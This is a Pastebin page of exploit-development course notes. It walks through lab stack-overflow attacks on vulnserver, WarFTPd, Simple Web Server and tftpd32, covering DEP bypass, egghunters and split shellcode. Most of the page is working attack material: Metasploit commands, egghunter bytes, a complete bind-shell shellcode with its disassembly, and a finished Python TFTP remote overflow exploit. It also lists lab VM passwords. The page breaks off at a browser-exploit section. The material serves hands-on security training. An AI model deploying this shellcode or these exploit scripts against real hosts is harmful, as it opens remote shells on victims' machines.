Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- San Diego Exploit Development 2018
- Whitepapers of interest:
- https://www.sans.org/reading-room/whitepapers/firewalls/tactical-data-diodes-industrial-automation-control-systems-36057
- #######################
- # VMs for this course #
- #######################
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
- username: workshop
- password: password
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
- user: infosecaddicts
- pass: infosecaddicts
- You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
- #######################################################
- # Files you may find helpful for learning Exploit Dev #
- #######################################################
- https://s3.amazonaws.com/secureninja/files/slides.zip
- https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip
- #####################################
- # Quick Stack Based Buffer Overflow #
- #####################################
- - You can download everything you need for this exercise (except netcat) from the link below
- https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
- - Extract this zip file to your Desktop
- - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
- - Open a new command prompt and type:
- ---------------------------Type This-----------------------------------
- nc localhost 9999
- -----------------------------------------------------------------------
- - In the new command prompt window where you ran nc type:
- HELP
- - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
- - Now double-click on 1-simplefuzzer.py
- - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
- - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
- - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
- - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
- - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
- - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
- - Calculate the distance to EIP by running script 3-3000chars.py
- - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
- 4-count-chars-to-EIP.py
- - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
- 5-2006char-eip-check.py
- - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
- 6-jmp-esp.py
- - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
- 7-first-exploit
- - In this script we actually do the stack overflow and launch a bind shell on port 4444
- 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
- ---------------------------Type This-----------------------------------
- cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
- vi vulnserv.rb (paste the code into this file)
- cd ~/toolz/metasploit
- ./msfconsole
- use exploit/windows/misc/vulnserv
- set PAYLOAD windows/meterpreter/bind_tcp
- set RHOST CHANGEME-TO-YOUR-WIN7-IP
- set RPORT 9999
- exploit
- -----------------------------------------------------------------------------------
- Day 1 Homework:
- Watch the following videos and take notes for questions tomorrow.
- http://www.securitytube.net/video/1389
- http://www.securitytube.net/video/1398
- http://www.securitytube.net/video/1399
- -----------------------------------------------------------------------------------------------------------------------
- #########
- # Day 2 #
- #########
- You can download the Secure Ninja courseware here:
- https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
- Morning challenge:
- Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver.
- Day 2 Homework:
- Watch the following videos and take notes for questions tomorrow.
- http://www.securitytube.net/video/1406
- http://www.securitytube.net/video/1407
- http://www.securitytube.net/video/1408
- -----------------------------------------------------------------------------------------------------------------------
- #########
- # Day 3 #
- #########
- You can download the Secure Ninja courseware here:
- https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
- Morning challenge:
- Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine.
- NOTE: If you did the SMail exploit on Windows XP yesterday, then please do it on Windows 7 today prior to doing the Easy File Sharing Web Server 7.2 exploit.
- Day 3 Homework:
- Watch the following videos and take notes for questions tomorrow.
- https://s3.amazonaws.com/secureninja/videos/0006-Intro-to-Mona.mp4
- https://s3.amazonaws.com/secureninja/videos/0007-Mona-continued.mp4
- https://s3.amazonaws.com/secureninja/videos/0014-DEP-Basics.mp4
- https://s3.amazonaws.com/secureninja/videos/0015-Bypassing-DEP-using-ROP-chains.mp4
- #########
- # Day 4 #
- #########
- You can download the Secure Ninja courseware here:
- https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
- Morning challenge:
- Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine.
- -------------------------------------------------------------------
- All of the content
- You can download the Exploit Dev VMs from the links below:
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
- user: Administrator
- pass: strategicsec
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
- user: strategicsec
- pass: strategicsec
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
- user: exploitlab
- pass: exploitlab
- All of the exploit script listed below is contained in the following zip file. Please download it to your XP-ED-Attack-Host VM. The password for the zip file is: joemccray
- https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip
- ###########################
- # Lab 1a: Stack Overflows #
- ###########################
- #################################
- # Start WarFTPd #
- # Start WinDBG #
- # Press F6 #
- # Attach to war-ftpd.exe #
- #################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
- python warftpd1.py | nc XPSP3-ED-Target-IP 21
- -----------------------------------------------------------------------
- At WINDBG prompt
- “r” to show registers or “alt+4”
- ---------------------------Type This-----------------------------------
- dd esp
- -----------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- python warftpd2.py | nc XPSP3-ED-Target-IP 21
- -----------------------------------------------------------------------
- At WINDBG prompt
- “r” to show registers or “alt+4”
- ---------------------------Type This-----------------------------------
- dd esp
- -----------------------------------------------------------------------
- Eip: 32714131
- esp: affd58 (71413471)
- Now we need to SSH into the StrategicSec Ubuntu host
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 32714131
- 485
- ruby pattern_offset.rb 71413471
- 493
- -----------------------------------------------------------------------
- Distance to EIP is: 485
- Relative position of ESP is: 493
- RET – POP EIP
- RET 4 – POP EIP and shift ESP down by 4 bytes
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/
- ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
- -----------------------------------------------------------------------
- 0x7c9c167d push esp; retn 0x304d
- 0x7c9d30d7 jmp esp < - how about we use this one
- 0x7c9d30eb jmp esp
- 0x7c9d30ff jmp esp
- warftpd3.py with Notepad++
- Fill in the appropriate values
- Distance to EIP
- Address of JMP ESP
- ---------------------------Type This-----------------------------------
- python warftpd3.py | nc XPSP3-ED-Target-IP 21
- 0:003> dd eip
- 0:003> dd esp
- -----------------------------------------------------------------------
- Mention bad characters
- No debugger
- ---------------------------Type This-----------------------------------
- python warftpd4.py | nc XPSP3-ED-Target-IP 21
- nc XPSP3-ED-Target-IP 4444
- -----------------------------------------------------------------------
- ###########################################
- # Lab 1b: Stack Overflows with DEP Bypass #
- ###########################################
- Reboot your target host and choose the "2nd" option for DEP.
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
- ---------------------------Type This-----------------------------------
- python warftpd1.py | nc XPSP3-ED-Target-IP 21
- At WINDBG prompt
- “r” to show registers or “alt+4”
- dd esp
- python warftpd2.py | nc XPSP3-ED-Target-IP 21
- At WINDBG prompt
- “r” to show registers or “alt+4”
- dd esp
- -----------------------------------------------------------------------
- Eip: 32714131
- esp: affd58 (71413471)
- Now we need to SSH into the StrategicSec Ubuntu host
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 32714131
- 485
- ruby pattern_offset.rb 71413471
- 493
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 32714131
- cd /home/strategicsec/toolz/metasploit/
- ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
- python warftpd3.py | nc XPSP3-ED-Target-IP 21
- 0:003> dd eip
- 0:003> dd esp
- INT3s - GOOD!!!!!!!
- python warftpd4.py | nc XPSP3-ED-Target-IP 21
- nc XPSP3-ED-Target-IP 4444
- -----------------------------------------------------------------------
- strategicsec....exploit no workie!!!!
- Why????????? DEP!!!!!!!!!!!!!
- Let's look through ole32.dll for the following instructions:
- mov al,0x1
- ret 0x4
- We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
- ---------------------------Type This-----------------------------------
- ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
- -----------------------------------------------------------------------
- [DLLs/xpsp3/ole32.dll]
- 0x775ee00e b001c204
- 0x775ee00e mov al, 1
- 0x775ee010 ret 4
- Then we need to jump to the LdrpCheckNXCompatibility routine in
- ntdll.dll that disables DEP.
- Inside of ntdll.dll we need to find the following instructions:
- CMP AL,1
- PUSH 2
- POP ESI
- JE ntdll.7
- ---------------------------Type This-----------------------------------
- ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
- -----------------------------------------------------------------------
- [DLLs/xpsp3/ntdll.dll]
- 0x7c91cd24 3c016a025e0f84
- 0x7c91cd24 cmp al, 1
- 0x7c91cd26 push 2
- 0x7c91cd28 pop esi
- 0x7c91cd29 jz 7
- This set of instructions makes sure that AL is set to 1, 2 is pushed
- on the stack then popped into ESI.
- ---------------------------Type This-----------------------------------
- dep = "\x0e\xe0\x5e\x77"+\
- "\xff\xff\xff\xff"+\
- "\x24\xcd\x91\x7c"+\
- "\xff\xff\xff\xff"+\
- "A"*0x54
- python warftpd5.py | nc XPSP3-ED-Target-IP 21
- nc XPSP3-ED-Target-IP 4444
- -----------------------------------------------------------------------
- ########################################
- # Lab 2a: Not Enough Space (Egghunter) #
- ########################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
- -----------------------------------------------------------------------
- SWS - SIMPLE WEB SERVER
- -----------------------
- Running SWS on Strategicsec-XP-ED-Target-VM
- Start > Programs > Simple Web Server (it's in the middle somewhere)
- Red icon in system tray
- Double click it
- - it will pop up a menu
- - select "start"
- - dialog box shows starting params - port 82
- WinDBG
- - attach to "server.exe"
- ---------------------------Type This-----------------------------------
- python sws1.py | nc XPSP3-ED-Target-IP 82
- python sws2.py | nc XPSP3-ED-Target-IP 82
- SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
- cd /home/strategicsec/toolz/metasploit/tools
- ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
- ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
- -----------------------------------------------------------------------
- EGGHUNTER:
- ----------
- "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
- "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
- ^^^^^^^^^^^^^^^^
- ABBA
- JMP ESP
- /
- /
- GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
- User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
- -----sws3.py-----
- #!/usr/bin/python2
- import os # for output setting
- import sys
- import struct # for pack function
- # turn off output buffer and set binary mode
- sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
- pad = "A" * 225 # distance to EIP
- eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
- egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
- egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
- shellcode = "\xCC" * 700
- buf = "GET /"
- buf += pad + struct.pack('<I', eip) + egghunter
- buf += " HTTP/1.0\r\n"
- buf += "User-Agent: ABBAABBA"
- buf += shellcode
- buf += " HTTP/1.0\r\n"
- sys.stdout.write(buf)
- -----
- ############################################
- # Lab 2b: Not Enough Space (Negative Jump) #
- ############################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
- -----------------------------------------------------------------------
- [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
- ^
- 1 ----------------------1 overflow the buffer---------------------------|
- ^ ^
- |
- 2 ----jump over seh record---|
- ^ ^
- |
- 3--POP 2 words off stack---|
- ^
- 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
- #########################################
- # Lab 2c: Not Enough Space (Trampoline) #
- #########################################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
- -----------------------------------------------------------------------
- On the Strategicsec-XP-ED-Target-VM VM
- - open a command prompt
- - c:\software\tftpd32
- - run tftpd32.exe
- - UDP port 69
- (socket code is already in the scripts)
- On your attack host please install:
- NASM - Netwide Assembler
- -----------------------------------------------------------------------------------------------------------------
- We want to generate the shellcode (BIND SHELL on Port 4444)
- - No restricted characters
- - Encoder: NONE
- Create a Python file called dumpshellcode.py
- ---
- #!/usr/bin/python2
- import os
- import sys
- import struct
- # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
- shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
- shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
- shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
- shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
- shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
- shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
- shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
- shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
- shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
- shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
- sys.stdout.write(shellcode)
- ---
- python dumpshell.py > bindshell.bin
- copy bindshellcode.bin into the "c:\Program Files\nasm" directory
- Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
- 317 bindshell.bin
- ---------------------------Type This-----------------------------------
- C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
- -----------------------------------------------------------------------
- 00000000 FC cld
- 00000001 6AEB push byte -0x15
- 00000003 4D dec ebp
- 00000004 E8F9FFFFFF call dword 0x2
- 00000009 60 pushad
- 0000000A 8B6C2424 mov ebp,[esp+0x24]
- 0000000E 8B453C mov eax,[ebp+0x3c]
- 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
- 00000015 01EF add edi,ebp
- 00000017 8B4F18 mov ecx,[edi+0x18]
- 0000001A 8B5F20 mov ebx,[edi+0x20]
- 0000001D 01EB add ebx,ebp
- 0000001F 49 dec ecx
- 00000020 8B348B mov esi,[ebx+ecx*4]
- 00000023 01EE add esi,ebp
- 00000025 31C0 xor eax,eax
- 00000027 99 cdq
- 00000028 AC lodsb
- 00000029 84C0 test al,al
- 0000002B 7407 jz 0x34
- 0000002D C1CA0D ror edx,0xd
- 00000030 01C2 add edx,eax
- 00000032 EBF4 jmp short 0x28
- 00000034 3B542428 cmp edx,[esp+0x28]
- 00000038 75E5 jnz 0x1f
- 0000003A 8B5F24 mov ebx,[edi+0x24]
- 0000003D 01EB add ebx,ebp
- 0000003F 668B0C4B mov cx,[ebx+ecx*2]
- 00000043 8B5F1C mov ebx,[edi+0x1c]
- 00000046 01EB add ebx,ebp
- 00000048 032C8B add ebp,[ebx+ecx*4]
- 0000004B 896C241C mov [esp+0x1c],ebp
- 0000004F 61 popad
- 00000050 C3 ret
- 00000051 31DB xor ebx,ebx
- 00000053 648B4330 mov eax,[fs:ebx+0x30]
- 00000057 8B400C mov eax,[eax+0xc]
- 0000005A 8B701C mov esi,[eax+0x1c]
- 0000005D AD lodsd
- 0000005E 8B4008 mov eax,[eax+0x8]
- 00000061 5E pop esi
- 00000062 688E4E0EEC push dword 0xec0e4e8e
- 00000067 50 push eax
- 00000068 FFD6 call esi
- 0000006A 6653 push bx
- 0000006C 66683332 push word 0x3233
- 00000070 687773325F push dword 0x5f327377
- 00000075 54 push esp
- 00000076 FFD0 call eax
- 00000078 68CBEDFC3B push dword 0x3bfcedcb
- 0000007D 50 push eax
- 0000007E FFD6 call esi PART 1
- 00000080 5F pop edi
- 00000081 89E5 mov ebp,esp
- 00000083 6681ED0802 sub bp,0x208
- 00000088 55 push ebp
- 00000089 6A02 push byte +0x2
- 0000008B FFD0 call eax
- 0000008D 68D909F5AD push dword 0xadf509d9
- 00000092 57 push edi
- 00000093 FFD6 call esi
- 00000095 53 push ebx
- 00000096 53 push ebx
- --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
- 00000097 53 push ebx
- 00000098 53 push ebx
- 00000099 53 push ebx
- 0000009A 43 inc ebx
- 0000009B 53 push ebx
- 0000009C 43 inc ebx
- 0000009D 53 push ebx PART 2
- 0000009E FFD0 call eax
- 000000A0 6668115C push word 0x5c11
- 000000A4 6653 push bx
- 000000A6 89E1 mov ecx,esp
- 000000A8 95 xchg eax,ebp
- 000000A9 68A41A70C7 push dword 0xc7701aa4
- 000000AE 57 push edi
- 000000AF FFD6 call esi
- 000000B1 6A10 push byte +0x10
- 000000B3 51 push ecx
- 000000B4 55 push ebp
- 000000B5 FFD0 call eax
- 000000B7 68A4AD2EE9 push dword 0xe92eada4
- 000000BC 57 push edi
- 000000BD FFD6 call esi
- 000000BF 53 push ebx
- 000000C0 55 push ebp
- 000000C1 FFD0 call eax
- 000000C3 68E5498649 push dword 0x498649e5
- 000000C8 57 push edi
- 000000C9 FFD6 call esi
- 000000CB 50 push eax
- 000000CC 54 push esp
- 000000CD 54 push esp
- 000000CE 55 push ebp
- 000000CF FFD0 call eax
- 000000D1 93 xchg eax,ebx
- 000000D2 68E779C679 push dword 0x79c679e7
- 000000D7 57 push edi
- 000000D8 FFD6 call esi
- 000000DA 55 push ebp
- 000000DB FFD0 call eax
- 000000DD 666A64 push word 0x64
- 000000E0 6668636D push word 0x6d63
- 000000E4 89E5 mov ebp,esp
- 000000E6 6A50 push byte +0x50
- 000000E8 59 pop ecx
- 000000E9 29CC sub esp,ecx
- 000000EB 89E7 mov edi,esp
- 000000ED 6A44 push byte +0x44
- 000000EF 89E2 mov edx,esp
- 000000F1 31C0 xor eax,eax
- 000000F3 F3AA rep stosb
- 000000F5 FE422D inc byte [edx+0x2d]
- 000000F8 FE422C inc byte [edx+0x2c]
- 000000FB 93 xchg eax,ebx
- 000000FC 8D7A38 lea edi,[edx+0x38]
- 000000FF AB stosd
- 00000100 AB stosd
- 00000101 AB stosd
- 00000102 6872FEB316 push dword 0x16b3fe72
- 00000107 FF7544 push dword [ebp+0x44]
- 0000010A FFD6 call esi
- 0000010C 5B pop ebx
- 0000010D 57 push edi
- 0000010E 52 push edx
- 0000010F 51 push ecx
- 00000110 51 push ecx
- 00000111 51 push ecx
- 00000112 6A01 push byte +0x1
- 00000114 51 push ecx
- 00000115 51 push ecx
- 00000116 55 push ebp
- 00000117 51 push ecx
- 00000118 FFD0 call eax
- 0000011A 68ADD905CE push dword 0xce05d9ad
- 0000011F 53 push ebx
- 00000120 FFD6 call esi
- 00000122 6AFF push byte -0x1
- 00000124 FF37 push dword [edi]
- 00000126 FFD0 call eax
- 00000128 8B57FC mov edx,[edi-0x4]
- 0000012B 83C464 add esp,byte +0x64
- 0000012E FFD6 call esi
- 00000130 52 push edx
- 00000131 FFD0 call eax
- 00000133 68F08A045F push dword 0x5f048af0
- 00000138 53 push ebx
- 00000139 FFD6 call esi
- 0000013B FFD0 call eax
- part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
- part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
- part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
- part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
- part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
- part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
- part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
- part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
- part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
- part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
- part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
- STACK SHIFTER:
- prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
- prepend += "\x44" # inc esp
- ---- final script ----
- #!/usr/bin/python2
- #TFTP Server remote Buffer Overflow
- import sys
- import socket
- import struct
- if len(sys.argv) < 2:
- sys.stderr.write("Usage: tftpd.py <host>\n")
- sys.exit(1)
- target = sys.argv[1]
- port = 69
- eip = 0x7e429353 # jmp esp in USER32.DLL
- part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
- part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
- part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
- part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
- part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
- part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
- part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
- part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
- part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
- part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
- part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
- part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
- part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
- part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
- part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
- part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
- part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
- part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
- part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
- part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
- part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
- prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
- prepend += "\x44" # inc esp
- buf = "\x00\x01" # receive command
- buf += "\x90" * (256 - len(part2)) # NOPs
- buf += part2 # shellcode part 2
- buf += struct.pack('<I', eip) # EIP (JMP ESP)
- buf += prepend # stack shifter
- buf += part1 # shellcode part 1
- buf += "\xE9" + struct.pack('<i', -380) # JMP -380
- buf += "\x00" # END
- # print buf
- # buf = "\x00\x01" # receive command
- # buf += "A" * 300 + "\x00"
- sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- try:
- sock.connect((target, port))
- sock.sendall(buf)
- except Exception as e:
- sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
- finally:
- sock.close()
- sys.stderr.write("Sent.\n")
- -----------------------------------------------------------------------------------------------------------------
- How does all of this actually work
- Total shellcode length: 315
- Part1: 150
- Part2: 165
- NOPS * (256 - 165)
- 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
- | | |
- 256 260 150 (410) |
- |<------------------------------------------------------------------------------------------------------------|
- Jump to the
- 30 byte mark
- ############################
- # Lab 3: Browsers Exploits #
- ############################
- ---------------------------Type This-----------------------------------
- cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
- -----------------------------------------------------------------------
- Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
- rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
- <object id=quicktime clsid="999-999999-99-99999">
